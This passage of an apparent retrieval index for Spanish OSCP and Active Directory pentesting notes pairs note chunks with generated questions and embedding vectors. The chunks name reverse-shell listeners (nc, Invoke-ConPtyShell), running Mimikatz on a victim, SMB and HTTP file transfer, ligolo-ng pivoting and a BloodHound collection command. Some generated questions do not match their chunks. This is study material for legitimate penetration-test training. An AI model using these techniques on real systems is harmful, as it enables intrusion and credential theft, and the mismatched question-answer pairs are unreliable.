-0.05166, 0.05399, -0.0134, -0.039, 0.02683, 0.08476, 0.00941, -0.0026, 0.00473, -0.02233, 0.05422, 0.07572, -0.01185, -0.10509, -0.02823, -0.07004, -0.05824, 0.04001, -0.00341, -0.09542, -0.01426, -0.01594, 0.05878, -0.03336, -0.01705, 3e-05]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# 1) Recolectar datos desde Kali (necesitas creds vΓ‘lidas)\nbloodhound-python -u juan -p 'Password1' -d corp.local -ns 10.10.10.10 -c All", "indexar": "ΒΏQuΓ© programa recolecta datos de un dominio de manera automΓ‘tica?", "v": [-0.1335, 0.03497, -0.06342, -0.11755, 0.0933, -0.06126, 0.14482, -0.05181, -0.23292, -0.03693, -0.13736, -0.15611, 0.03704, -0.19389, 0.07479, -0.00147, 0.1334, -0.09382, -0.05342, -0.10333, -0.08075, -0.15471, 0.05312, -0.01908, 0.00495, -0.05659, 0.09043, -0.01519, -0.05695, 0.13053, 0.14093, -0.01402, 0.03479, -0.05725, 0.03277, 0.03485, 0.05681, 0.09613, 0.05293, -0.07907, 0.01844, -0.04098, -0.18626, 0.00825, 0.0521, 0.04366, -0.06945, -0.04591, -0.0408, -0.14546, -0.03647, 0.05365, -0.04678, -0.04141, 0.03289, -0.05587, 0.04933, -0.056, 0.05211, 0.0212, 0.01478, 0.04449, -0.05371, 0.05844, -0.04968, -0.09204, 0.07102, 0.00431, 0.01105, 0.07095, 0.07705, 0.02003, 0.04092, -0.04212, 0.11793, 0.01295, -0.00158, -0.01236, 0.06466, -0.03674, -0.03272, -0.03056, 0.00838, 0.02617, -0.03436, -0.06265, 0.03136, -0.08341, 0.04993, -0.04233, 0.08033, 0.03084, 0.00654, 0.07476, 0.07776, -0.02164, 0.09221, -0.08242, -0.02514, 0.07068, 0.05356, 0.0014, -0.05216, 0.1399, 0.05692, 0.15073, 0.05539, -0.02436, -0.07497, 0.00549, -0.04035, -0.04528, -0.10084, -0.04484, -0.01853, 0.04407, -0.02153, 0.03259, 0.03755, -0.06395, -0.05262, 0.00518, 0.07113, -0.00703, 0.07348, -0.06774, -0.07467, 0.05962, -0.00067, -0.02094, 0.03525, 0.01139, -0.04826, -0.08192, 0.00327, 0.04004, -0.00782, -0.05907, -0.03186, -0.07052, 0.00347, 0.05847, -0.05844, 0.01001, 0.0766, -0.12668, 0.04676, -0.05858, -0.01883, 0.0097, -0.0269, 0.04873, 0.05232, 0.08845, -0.0166, 0.092, -0.04921, -0.06534, -0.01096, 0.01847, -0.00033, -0.02123, -0.04079, 0.00135, 0.0355, 0.00343, 0.02976, -0.03574, 0.10371, 0.04876, -0.05891, 0.05909, -0.01441, -0.0626, -0.04585, -0.00352, -0.02429, -0.1048, 0.05908, -0.07891, -0.08036, -0.01547, 0.02597, -0.00425, -0.00834, 0.02466, 0.03031, -0.06468, 0.02608, 0.03486, 0.02355, 0.08325, -0.04328, -0.03356, 0.01139, -0.08118, -0.04858, 0.05776, 0.06612, 0.0272, -0.10125, -0.01143, -0.01799, 0.02692, -0.01668, 0.11387, -0.01552, -0.01743, 0.04766, 0.02365, -0.0399, -0.01753, 0.07469, -0.0397, -0.02788, -0.06763, -0.00051, 0.00146, -0.02292, 0.0058, -0.04428, 0.04011, 0.08693, 0.00244, -0.0079, -0.02594, 0.10358, 0.06498, 0.05962, 0.01146, -0.0609, 0.0353, 0.01405, -0.03181, 0.06438, 0.03024, 0.00854, -0.04666, -0.01893, -0.07798, 0.01127, 0.06002, 0.0073, -0.03962, -0.04354, -0.04826, -0.09513, 0.07853, 0.00721, -0.01036, -0.02712, -0.0066, 0.02716, -0.03642, 0.03002, -0.00843]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# 1) Recolectar datos desde Kali (necesitas creds vΓ‘lidas)\nbloodhound-python -u juan -p 'Password1' -d corp.local -ns 10.10.10.10 -c All", "indexar": "ΒΏCon quΓ© puedo extraer credenciales y usuarios de una red local?", "v": [-0.13691, 0.09653, -0.01082, 0.02549, 0.10029, 0.003, 0.01125, 0.0009, -0.02728, -0.20966, -0.21269, -0.09303, -0.05597, -0.1677, 0.11219, -0.01076, 0.0057, 0.10513, 0.12777, -0.05762, -0.04698, -0.13627, -0.13025, 0.04389, 0.08345, 0.09171, -0.01005, -0.03389, 0.07542, 0.08395, 0.0164, -0.01078, -0.0919, 0.04004, -0.06592, 0.15271, 0.05655, 0.12183, -0.04364, 0.08249, 0.02676, 0.00636, -0.03902, -0.05476, 0.08927, 0.04861, -0.08503, -0.02056, -0.10498, -0.00413, -0.09271, -0.15571, -0.11853, -0.12172, -0.05194, -0.02669, 0.07659, -0.08416, 0.01617, -0.04852, -0.04073, -0.01189, -0.00467, 0.09639, 0.00286, -0.06817, 0.01321, 0.01278, -0.06275, 0.12719, -0.07577, -0.00411, 0.0476, 0.00644, 0.03585, 0.0442, -0.0324, -0.06768, 0.07019, -0.05534, 0.03857, 0.06587, 0.03366, -0.08469, 0.02827, -0.0323, 0.00259, -0.14696, -0.0347, -0.01026, 0.13921, -0.03868, 0.12687, -0.02552, -0.01707, -0.02492, 0.01121, 0.0197, -0.07205, 0.02985, -0.07461, -0.04446, -0.01475, 0.12937, 0.02621, 0.00944, 0.05526, 0.01346, 0.06988, -0.04352, 0.0698, -0.04255, -0.04871, -0.00141, -0.0308, -0.00432, -0.05297, 0.04377, -0.01833, 0.01338, 0.02153, -0.10816, 0.08525, -0.12066, -0.00089, 0.01204, -0.07137, 0.07623, -0.08085, -0.08115, -0.04706, 0.02603, 0.02496, -0.06823, 0.0193, -0.01929, 0.04108, -0.1145, -0.04327, 0.03197, -0.01788, -0.08826, -0.09912, -0.05729, -0.00143, 0.0305, -0.01451, -0.06207, -0.03262, -0.07344, 0.03674, 0.02446, -0.04655, -0.03165, -0.04647, 0.08078, 0.10753, -0.01706, -0.06506, 0.01878, -0.04751, -0.08575, 0.08148, -0.01677, -0.06933, -0.07882, -0.03769, 0.0212, 0.01686, 0.02069, -0.01956, 0.07132, -0.07185, -0.09187, 0.05732, -0.02827, 0.04357, -0.09875, -0.01083, -0.07671, 0.05793, -0.00358, -0.01219, 0.02674, -0.02308, -0.05983, 0.00494, -0.01947, -0.01087, -0.00306, -0.02355, -0.01549, 0.05546, 0.03371, 0.01541, 0.00569, 0.07422, -0.00269, -0.04258, -0.04071, -0.08612, 0.00977, 0.03311, 0.05163, -0.00059, 0.04997, 0.01336, 0.05111, -0.0181, 0.04599, 0.02659, 0.00855, 0.05413, -0.0078, -0.0975, -0.0061, 0.04867, -0.02382, -0.00684, -0.08263, 0.04336, 0.00031, 0.0262, 0.04325, 0.00149, 0.0321, -0.00154, -0.03353, -0.0077, 0.08416, 0.05788, -0.0046, -0.05115, -0.02505, -0.01457, -0.02879, 0.03201, 0.08521, -0.02009, -0.04747, -0.02391, 0.04163, -0.02628, -0.04422, -0.04151, -0.004, -0.08897, 0.03045, -0.00195, -0.0289, -0.02483, -0.00456, 0.05931, -0.01827, 0.03128, 0.07114]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "# 1) Recolectar datos desde Kali (necesitas creds vΓ‘lidas)\nbloodhound-python -u juan -p 'Password1' -d corp.local -ns 10.10.10.10 -c All", "indexar": "ΒΏHay alguna alternativa a Bloodhound para analizar Active Directory?", "v": [-0.25475, 0.14725, 0.04076, -0.06528, -0.14491, 0.02802, -0.07161, -0.029, -0.14623, 0.10577, 0.09171, -0.22771, -0.06216, 0.09511, 0.10155, -0.09606, -0.0397, -0.11461, 0.01697, -0.0741, -0.02854, 0.06532, -0.17774, 0.066, 0.06027, -0.0157, -0.05507, 0.11564, 0.02733, -0.01627, -0.02963, -0.0051, 0.05919, 0.02245, -0.07896, 0.03289, -0.04513, 0.0499, 0.15864, 0.08683, -0.07288, -0.01584, -0.00093, -0.0526, 0.00816, 0.0994, -0.11241, -0.067, 0.02261, 0.13344, 0.02182, 0.05406, -0.16665, -0.02621, 0.10908, -0.00478, -0.04751, -0.10895, 0.00381, -0.17004, 0.00656, -0.06788, 0.01047, -0.05119, -0.05094, -0.01221, 0.03577, -0.06582, -0.05273, 0.15016, -0.06722, 0.02699, -0.00513, 0.07559, -0.0599, -0.04453, 0.11194, 0.00931, -0.00501, 0.10121, 0.07029, 0.02294, 0.05683, 0.05184, -0.12293, -0.08016, 0.01345, -0.07353, 0.07702, 0.08011, -0.00142, -0.01202, -0.05087, 0.10564, -0.06145, -0.01001, 0.04777, 0.00518, 0.05471, 8e-05, 0.01301, -0.01339, -0.05733, 0.07702, 0.0029, 0.04568, -0.14215, 0.05632, -0.05391, 0.04628, -0.03918, 0.06098, -0.00388, -0.01635, 0.05071, 0.01126, 0.04696, 0.05078, 0.02603, 0.02192, -0.08065, 0.04959, 0.00335, -0.0192, -0.09113, -0.02943, -0.00966, -0.05423, -0.03376, 0.07709, -0.01887, 0.07431, -0.05479, -0.13797, -0.13013, 0.03619, 0.02299, 0.01243, 0.03906, -0.10733, -0.06377, -0.02802, 0.04883, 0.05507, -0.01394, -0.0309, 0.00011, 0.02092, 0.00027, 0.02473, 0.00764, 0.01787, -0.01024, 0.04558, 0.02199, 0.04451, -0.0051, 0.00689, -0.0855, 0.05015, -0.03204, -0.05625, -0.03073, -0.02937, -0.08537, 0.06009, -0.04114, -0.03024, -0.03695, 0.04634, 0.03403, 0.03767, 0.02633, -0.04775, 0.03129, -0.0346, 0.04401, -0.08988, 0.04737, 0.02563, 0.0928, -0.01206, -0.07426, 0.02354, 0.06576, 0.01246, 0.02367, 0.00212, -0.01918, -0.03502, 0.0439, 0.06046, 0.02469, -0.06036, -0.03167, 0.00832, 0.10201, -0.07957, -0.02014, -0.03146, -0.02247, 0.03165, 0.00022, 0.0422, 0.01144, 0.0143, -0.03753, 0.0951, -0.00952, -0.00655, -0.0743, 0.00161, 0.04728, 0.04032, -0.03481, 0.01449, 0.00367, -0.00387, -0.04429, 0.03089, -0.03589, 0.01787, -0.00901, 0.03747, -0.02155, 0.05669, 0.00525, -0.02451, 0.02486, -0.01461, -0.00745, 0.0175, 0.00832, 0.06847, -0.06555, 0.03833, 0.01872, -0.01415, 0.01337, 0.01124, 0.08535, 0.01835, 0.00038, 0.04104, -0.01597, -0.02397, -0.00899, 0.0029, -0.00619, -0.01213, 0.03278, -0.03577, -0.00786, 0.03987, 0.00709, 0.02139]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Resumen TL;DR\n\n| Pregunta | Respuesta |\n|---|---|\n| ΒΏTengo GUI central? | **No**. Tu \"GUI\" es tener varios terminales abiertos. BloodHound es la ΓΊnica tool con GUI propia. |\n| ΒΏReverse shell? | `nc` + `Invoke-ConPtyShell` desde la vΓ­ctima. Lo recibes en `nc -lvnp 4444`. |\n| ΒΏCΓ³mo envΓ­o datos? | **Subes** con `python3 -m http.server`. **Recibo** con `impacket-smbserver`. |\n| ΒΏCΓ³mo pivoto? | `ligolo-ng` (proxy en Kali + agent en vΓ­ctima). Una vez montado, las herramientas tiran por el tΓΊnel transparente. |\n| ΒΏBloodHound? | `apt install bloodhound bloodhound.py neo4j`. |\n| ΒΏMimikatz? | Descargado en `tu carpeta`. Se ejecuta **en la vΓ­ctima**, no en Kali. |\n| ΒΏImpacket? | Instalado a nivel sistema (`impacket-*`). Corre en Kali, habla con vΓ­ctimas. |", "indexar": "con que puedo montar un tΓΊnel transparente para pivoteo desde Kali?", "v": [0.04713, -0.07103, -0.2493, -0.03531, -0.0301, -0.01979, -0.01019, 0.0701, -0.06247, -0.04688, 0.05069, 0.06435, 0.13631, 0.10148, -0.10116, 0.08304, -0.08062, -0.14107, 0.17926, 0.00169, -0.12857, -0.10523, -0.041, -0.09545, 0.08696, 0.10931, 0.00381, -0.03801, -0.10475, -0.14504, 0.01664, 0.08788, 0.05076, -0.0043, 0.03843, -0.09901, 0.00101, 0.13516, 0.0401, -0.01679, -0.03629, -0.06322, 0.01021, 0.13642, 0.02942, -0.04056, -0.00441, -0.06954, 0.06542, -0.02156, 0.06986, -0.02828, -0.15727, 0.01254, 0.08947, -0.04784, 0.08908, 0.00569, 0.06216, -0.17317, 0.08231, -0.03707, 0.02583, 0.11276, -0.04915, -0.06311, 0.00531, 0.00396, -0.1484, -0.06773, -0.02864, -0.05867, 0.02326, 0.08719, -0.09188, 0.02785, -0.0247, 0.0271, 0.03251, 0.15687, 0.01229, 0.06899, 0.013, 0.03993, -0.05272, -0.02597, -0.09221, 0.01399, 0.02603, 0.04052, -0.10069, 0.01727, 0.09925, 0.11771, 0.11271, 0.00974, -0.0705, 0.1192, -0.04697, -0.03032, -0.00301, 0.0054, -0.0244, 0.14596, 0.12757, 0.05204, -0.00706, -0.09024, 0.02202, -0.03009, 0.02703, 0.14976, -0.02822, -0.08323, 0.01308, -0.00452, -0.00076, 0.05008, -0.05992, -0.04287, 0.09032, -0.00721, -0.01978, -0.02108, -0.03648, -0.04457, -0.01283, 0.03982, 0.04133, 0.06955, -0.02315, 0.09075, -0.05088, -0.01166, 0.03734, -0.02123, 0.03765, 0.03009, 0.03654, 0.1023, 0.05524, -0.04157, 0.0018, -0.03103, 0.00051, -0.04296, -0.05773, -0.15345, 0.01132, 0.01214, -0.00972, 0.04412, 0.0129, 0.01678, 0.03011, -0.08422, 0.00801, 0.0271, -0.01479, 0.08487, 0.03782, 0.05308, 0.02087, -0.01734, 0.02329, -0.01907, -0.0618, -0.02861, 0.03179, -0.07356, -0.03151, 0.1062, 0.0209, -0.00246, 0.01888, -0.01451, -0.01323, -0.02399, 0.01767, -0.00821, 0.04177, -0.0879, -0.02458, 0.10316, -0.01307, -0.04738, 0.08178, -0.04939, 0.05832, 0.01353, 0.00988, -0.02914, -0.02852, -0.05067, 0.03956, -0.03714, -0.00719, -0.00753, 0.06433, -0.04624, -0.01783, 0.02911, 0.06284, -0.05569, -0.05386, -0.05635, -0.05195, -0.02487, 0.02968, 0.06438, 0.07259, -0.0354, 0.00218, -0.05523, 0.02736, 0.0764, 0.0148, -0.00293, -0.04879, 0.08173, 0.01413, 0.01749, 0.05221, -0.0088, -0.01444, 0.00989, -0.02938, -0.0011, -0.06895, 0.02679, 0.01612, 0.0157, -0.0396, -0.01368, 0.02962, -0.00703, -0.02582, 0.07096, 0.0205, -0.04592, 0.05093, 0.01384, 0.0335, 0.01225, -0.05781, 0.00871, 0.0169, 0.01597, -0.02714, -0.06601, -0.01634, 0.03888, -0.03298, -0.04883, 0.00494, -0.00471]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Resumen TL;DR\n\n| Pregunta | Respuesta |\n|---|---|\n| ΒΏTengo GUI central? | **No**. Tu \"GUI\" es tener varios terminales abiertos. BloodHound es la ΓΊnica tool con GUI propia. |\n| ΒΏReverse shell? | `nc` + `Invoke-ConPtyShell` desde la vΓ­ctima. Lo recibes en `nc -lvnp 4444`. |\n| ΒΏCΓ³mo envΓ­o datos? | **Subes** con `python3 -m http.server`. **Recibo** con `impacket-smbserver`. |\n| ΒΏCΓ³mo pivoto? | `ligolo-ng` (proxy en Kali + agent en vΓ­ctima). Una vez montado, las herramientas tiran por el tΓΊnel transparente. |\n| ΒΏBloodHound? | `apt install bloodhound bloodhound.py neo4j`. |\n| ΒΏMimikatz? | Descargado en `tu carpeta`. Se ejecuta **en la vΓ­ctima**, no en Kali. |\n| ΒΏImpacket? | Instalado a nivel sistema (`impacket-*`). Corre en Kali, habla con vΓ­ctimas. |", "indexar": "cual es una alternativa libre a bloodhound?", "v": [-0.18493, -0.0042, -0.00018, 0.08129, -0.1423, 0.05907, -0.0832, -0.08126, -0.10532, -0.04032, -0.06784, -0.21444, -0.0358, 0.09036, 0.01641, -0.08405, -0.03652, -0.04586, 0.11753, -0.07224, -0.10552, -0.04763, -0.12531, -0.04, -0.0426, -0.07772, 0.0192, 0.13313, -0.06275, 0.03362, -0.01204, -0.08065, 0.0653, 0.01254, -0.03709, 0.07066, 0.05773, 0.18182, 0.05721, 0.0279, -0.06639, -0.08726, 0.06536, -0.03993, -0.01363, -0.05199, -0.11727, 0.10761, 0.07917, 0.05735, -0.00224, 0.0842, -0.15293, -0.02611, 0.03964, 0.00879, 0.10649, -0.13193, -0.05315, -0.03564, -0.02452, -1e-05, 0.04431, -0.03768, -0.02023, 0.01834, -0.04183, -0.01436, 0.00394, 0.10028, 0.04284, 0.00562, -0.00601, -0.02378, -0.14415, 0.01827, -0.07811, -0.00419, 0.04383, 0.01409, 0.0154, -0.03221, 0.01808, 0.04873, -0.0227, -0.08933, 0.11322, -0.06107, 0.09938, 0.13896, 0.0282, -0.0214, -0.00089, 0.12647, -0.03927, -0.09808, -0.02367, 0.06039, 0.04235, 0.0312, 0.07388, 0.06306, -0.18724, 0.01232, 0.05075, -0.08408, -0.09656, 0.00208, -0.0691, -0.00265, -0.00535, 0.05279, -0.0226, 0.08018, -0.02438, -0.02361, 0.09835, 0.0806, 0.03876, 0.00701, -0.07128, -0.00642, -0.03053, -0.08989, -0.03895, 0.01064, 0.01555, 0.01143, -0.08548, 0.05652, 0.02417, 0.06345, -0.11776, -0.13331, -0.13411, -0.01416, 0.0482, -0.04888, 0.06416, -0.06185, -0.00712, -0.00915, 0.05993, -0.00398, -0.01632, -0.06167, -0.0199, -0.05774, 0.01215, -0.00805, -0.09478, 0.03503, -0.00853, 0.12508, -0.01563, 0.01311, -0.01877, -0.01288, -0.08742, 0.09191, -0.00807, -0.05687, -0.00713, -0.00259, -0.07285, 0.06425, -0.01277, 0.00936, -0.07683, -0.02958, 0.02667, 0.03728, 0.08029, -0.02267, 0.02915, -0.0431, 0.0178, -0.13916, 0.02324, 0.00764, 0.05421, 0.03054, -0.12243, 0.03316, 0.05597, -0.06397, 0.00776, 0.00283, 0.03157, -0.00805, 0.00337, 0.05893, 0.02214, -0.04962, -0.04851, 0.02497, 0.06109, -0.10067, -0.00349, -0.05097, -0.03813, -0.02392, -0.02245, 0.00281, -0.00457, 0.00559, -0.03588, 0.0703, -0.05481, 0.06374, 0.00666, 0.0147, 0.06851, 0.02319, -0.01721, 0.00632, 0.02683, -0.02636, -0.05835, -0.02489, 0.08125, 0.00371, 0.0277, 0.03744, -0.05382, 0.03353, 0.035, 0.0425, 0.0164, -0.04208, 0.01734, 0.03878, -0.02714, 0.0353, -0.01726, 0.06278, 0.02565, 0.02574, 0.04522, -0.02915, 0.07869, 0.08327, -0.01946, -0.03791, 0.00564, -0.00803, -0.04124, -0.03595, -0.00296, -0.04925, -0.02067, 0.04022, 0.01735, 0.0388, 0.05113, 0.02303]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "## Resumen TL;DR\n\n| Pregunta | Respuesta |\n|---|---|\n| ΒΏTengo GUI central? | **No**. Tu \"GUI\" es tener varios terminales abiertos. BloodHound es la ΓΊnica tool con GUI propia. |\n| ΒΏReverse shell? | `nc` + `Invoke-ConPtyShell` desde la vΓ­ctima. Lo recibes en `nc -lvnp 4444`. |\n| ΒΏCΓ³mo envΓ­o datos? | **Subes** con `python3 -m http.server`. **Recibo** con `impacket-smbserver`. |\n| ΒΏCΓ³mo pivoto? | `ligolo-ng` (proxy en Kali + agent en vΓ­ctima). Una vez montado, las herramientas tiran por el tΓΊnel transparente. |\n| ΒΏBloodHound? | `apt install bloodhound bloodhound.py neo4j`. |\n| ΒΏMimikatz? | Descargado en `tu carpeta`. Se ejecuta **en la vΓ­ctima**, no en Kali. |\n| ΒΏImpacket? | Instalado a nivel sistema (`impacket-*`). Corre en Kali, habla con vΓ­ctimas. |", "indexar": "que programa ejecuto en la vΓ­ctima para lanzar un reverse shell?", "v": [-0.02285, -0.02633, -0.15889, -0.15704, -0.08647, -0.03366, -0.10459, -0.00264, 0.00988, 0.00076, -0.00388, -0.02658, 0.04219, -0.01872, 0.04042, 0.02898, -0.04952, 0.05942, 0.01788, -0.03597, -0.08675, -0.00123, 0.0405, -0.11466, -0.06633, 0.13391, -0.00837, 0.03832, -0.01283, -0.05125, -0.14443, -0.08339, -0.01864, -0.07392, 0.10967, 0.08861, -0.02228, -0.06404, 0.0754, 0.14919, 0.19634, 0.01896, -0.11626, 0.04942, 0.0871, -0.02038, 0.06442, -0.02525, 0.0825, -0.0065, 0.01221, -0.03425, -0.19029, -0.06159, 0.09783, -0.07781, 0.06935, -0.16102, 0.05067, -0.04881, -0.01306, -0.01257, 0.09972, 0.01575, 0.07776, -0.02042, 0.05391, -0.03691, -0.01733, -0.02683, 0.02375, 0.00392, 0.0836, 0.04529, -0.09992, -0.06406, 0.03153, 0.04033, 0.00218, 0.00073, -0.14097, -0.10116, -0.06218, 0.14175, -0.01902, 0.00908, 0.00755, -0.00497, 0.02064, -0.0487, 0.07138, 0.00208, -0.0301, 0.10122, 0.02485, -0.13742, 0.06375, -0.07123, -0.05121, -0.02112, 0.08918, -0.12432, -0.00188, 0.10224, 0.07288, 0.01829, -0.08459, 0.06943, -0.13351, 0.09487, -0.04628, -0.03456, 0.04183, -0.01479, -0.06418, -0.0621, -0.0533, -0.04305, 0.11387, 0.01597, -0.05105, 0.09048, -0.01661, -0.0252, 0.02636, 0.02368, -0.07533, 0.04331, -0.033, 0.03584, 0.07167, 0.0265, 0.04952, 0.06796, -0.07477, 0.05971, 0.14341, 0.00783, 0.04177, -0.06314, 0.11816, 0.10765, -0.05042, -0.00548, -0.02716, -0.0699, 0.03355, -0.05968, -0.06011, 0.03522, 0.07536, 0.05412, -0.03338, 0.02043, -0.1287, -0.11297, -0.01347, -0.00561, 0.01707, 0.02152, -0.08303, 0.01551, -0.05573, -0.00019, 0.06922, -0.06328, -0.01339, 0.00252, 0.10157, 0.06329, 0.00208, 0.05204, 0.06684, 0.04179, -0.00385, -0.08046, 0.04285, -0.03144, 0.00034, -0.00144, -0.01821, 0.01774, 0.03071, -0.0282, -0.02515, -0.04013, -0.02581, 0.04788, -0.01081, 0.05609, 0.02007, 0.05663, 0.00745, -0.01121, 0.00027, -0.00838, 0.0014, 0.00265, 0.00648, 0.02524, -0.09536, 0.0555, 0.05426, -0.04528, 0.01732, 0.07153, -0.04732, -0.02683, -0.02494, 0.07488, 0.0114, 0.03493, 0.04733, 0.07919, 0.00853, -0.03552, 0.04525, 0.02967, 0.09197, 0.11059, -0.07967, -0.03934, 0.01065, 0.01215, -0.01831, -0.0563, 0.0211, 0.03551, -0.01019, -0.05602, -0.0242, -0.02412, 0.01366, -0.0347, -0.01662, 0.00819, 0.00503, -0.02377, -0.02907, -0.05187, -0.05028, 0.08624, -0.01941, -0.04882, -0.00768, 0.07176, -0.01621, -0.00283, 0.01451, 0.00223, -0.01192, 0.08242, 0.04331, -0.09469, -0.00112, -0.04526]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "# πŸ—ΊοΈ OSCP β€” Mapa Central (MOC)\n\n> Nota hub del vault. Desde aquΓ­ salen todos los caminos.\n> Origen: apuntes propios en `tu carpeta` + material de un laboratorio.", "indexar": "que herramienta sirve para organizar el flujo de trabajo de un laboratorio OSCP?", "v": [0.04802, -0.04984, -0.21155, -0.23803, -0.03247, -0.21055, 0.00964, 0.0454, -0.06276, -0.08476, -0.1062, -0.04721, 0.02142, -0.05447, 0.08152, 0.04325, 0.0986, -0.15096, -0.15333, 0.00319, -0.17735, 0.06637, -0.14697, 0.0228, -0.00287, 0.00971, 0.08741, -0.07574, -0.16942, 0.05443, 0.02533, 0.11321, 0.10488, -0.08194, 0.02901, -0.00124, -0.1186, -0.02848, -0.08281, 0.1522, -0.0815, 0.05533, -0.10873, 0.05593, 0.00243, -0.01129, 0.05526, -0.04438, 0.00521, 0.09996, -0.06594, -0.13959, -0.04494, 0.00756, -0.10471, -0.08305, 0.03326, -0.07908, 0.03088, -0.05731, -0.0278, 0.05608, -0.05025, -0.07724, 0.02735, -0.00538, -0.03037, -0.00631, -0.03758, 0.06371, -0.09583, 0.07313, -0.03475, -0.02423, -0.00093, -0.00254, -0.03034, 0.08287, 0.08052, -0.01611, 0.02111, 0.0536, 0.01072, 0.0422, -0.07367, -0.13745, 0.13424, 0.01607, -0.02641, -0.06769, -0.12895, 0.0791, 0.01975, 0.00452, 0.07843, -0.02123, 0.10283, -0.00078, 0.04846, 0.0032, 0.11965, -0.02273, -0.07526, 0.04288, -0.09198, 0.0778, 0.0456, 0.01771, -0.00571, -0.04853, -0.02839, 0.04684, 0.01915, 0.01729, -0.06871, 0.0237, 0.03407, -0.03153, 0.01669, -0.03945, -0.03732, 0.04881, -0.00552, -0.00663, -0.04915, -0.08455, 0.08868, 0.06139, 0.05436, -0.04583, -0.00901, 0.04072, -0.12719, 0.10107, -0.01294, -0.02023, -0.01626, -0.11876, 0.03747, -0.05603, 0.00717, 0.08316, -0.01093, -0.09199, 0.02556, 0.00422, 0.05845, -0.03482, -0.03741, -0.04234, 0.01178, -0.07765, 0.01462, 0.03102, -0.10102, 0.03448, -0.03325, -0.00479, -0.07681, 0.03874, -0.05273, -0.05018, 0.0148, 0.03545, -0.00988, 0.01768, 0.03053, -0.05037, 0.04906, 0.04387, 0.01472, -0.02979, 0.03855, -0.05091, -0.00885, -0.02981, -0.02586, -0.03521, 0.07249, -0.01411, -0.02141, 0.07746, -0.03607, -0.03353, 0.04366, -0.00514, 0.05135, -0.01162, 0.02412, 0.04555, 0.06739, -0.0012, 0.01102, -0.08772, 0.02128, -0.03466, 0.03614, -0.08807, 0.0619, 0.01617, -0.00737, -0.06034, -0.05158, -0.02358, -0.00598, 0.05019, -0.05763, 0.01184, -0.0323, 0.03794, 0.08183, -0.02361, 0.03135, -0.03558, -0.02327, 0.02956, 0.03238, 0.00585, 0.00602, 0.01032, 0.02971, -0.01607, 0.01022, -0.06252, -0.04326, 0.01807, 0.02554, 0.00919, 0.05705, 0.03749, 0.03191, 0.03499, 0.01338, -0.0318, 0.03704, 0.02747, 0.02772, -4e-05, -0.0407, -0.04448, 0.01991, 0.06755, -0.01575, -0.04981, -0.05848, -0.03973, -0.02772, -0.03101, -0.03038, -0.05023, 0.00995, -0.0152, 0.05742, -0.06161, 0.02367, 0.01972]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "# πŸ—ΊοΈ OSCP β€” Mapa Central (MOC)\n\n> Nota hub del vault. Desde aquΓ­ salen todos los caminos.\n> Origen: apuntes propios en `tu carpeta` + material de un laboratorio.", "indexar": "con que puedo estructurar mis apuntes y material de entrenamiento centralizado?", "v": [0.22457, 0.1481, -0.0503, -0.14053, 0.02148, -0.04882, -0.08809, 0.09758, -0.08635, -0.07812, -0.11571, 0.04813, -0.07858, 0.02096, 0.05118, -0.04462, -0.02838, -0.07328, -0.05738, 0.04509, -0.01675, -0.17074, 0.05104, 0.02783, -0.01567, -0.02616, 0.01669, 0.00425, -0.16307, -0.01033, 9e-05, 0.20496, 0.10713, 0.062, 0.04464, 0.00147, -0.07321, 0.10847, -0.08875, -0.02164, -0.11086, 0.0713, -0.10229, 0.03657, 0.14943, 0.06333, 0.06479, -0.01016, -0.08931, -0.00621, -0.03661, -0.01122, -0.00248, -0.08022, -0.06014, -0.15615, 0.13777, 0.00567, 0.06176, -0.01218, 0.05122, 0.04044, 0.03464, -0.06852, 0.03956, 0.07851, -0.09946, -0.0346, -0.09917, -0.0466, -0.05661, 0.02623, -0.04998, -0.06825, 0.01978, 0.01396, 0.03218, 0.0802, 0.03024, -0.01317, -0.02375, -0.00101, -0.04224, 0.05053, -0.09128, 0.0449, 0.08632, -0.01094, -0.0119, -0.03763, -0.00117, -0.01583, -0.11608, -0.01441, -0.09851, 0.00163, -0.09384, 0.09681, 0.03393, 0.08007, 0.02343, 0.10476, -0.00153, 0.08251, -0.00509, 0.00699, -0.00544, 0.02517, 0.01776, -0.1076, -0.00148, 0.00407, -0.07457, -0.0156, -0.02388, -0.0641, -0.04022, 0.08055, 0.01743, -0.05685, 0.04266, -0.00519, -0.04044, -0.03649, -0.08189, -0.06552, -0.0161, 0.06652, 0.11961, 0.10758, -0.0093, 0.04402, -0.03379, 0.01186, -0.01752, -0.07105, -0.02958, 0.0223, -0.058, -0.03257, -0.01427, 0.01883, 0.02675, -0.00178, -0.00881, 0.03825, 0.09445, -0.06631, -0.05621, -0.00687, -0.06517, -0.02198, 0.15051, 0.00153, -0.05961, 0.02589, 0.06844, -0.037, 0.03964, 0.05021, -0.04836, 0.13069, -0.0907, -0.04282, -0.01667, 0.0051, -0.03382, 0.00136, -0.01388, 0.10883, 0.018, -0.03829, 0.05057, -0.02217, 0.03096, -0.00849, -0.00444, -0.02776, -0.02442, 0.05081, -0.01256, 0.02978, -0.09971, 0.04981, 0.03645, 0.03006, -0.10803, 0.05217, 0.02195, -0.00957, -0.03923, 0.02218, 0.03603, -0.00247, -0.00455, -0.08159, -0.11378, 0.00675, 0.00941, 0.00392, -0.05428, 0.01764, 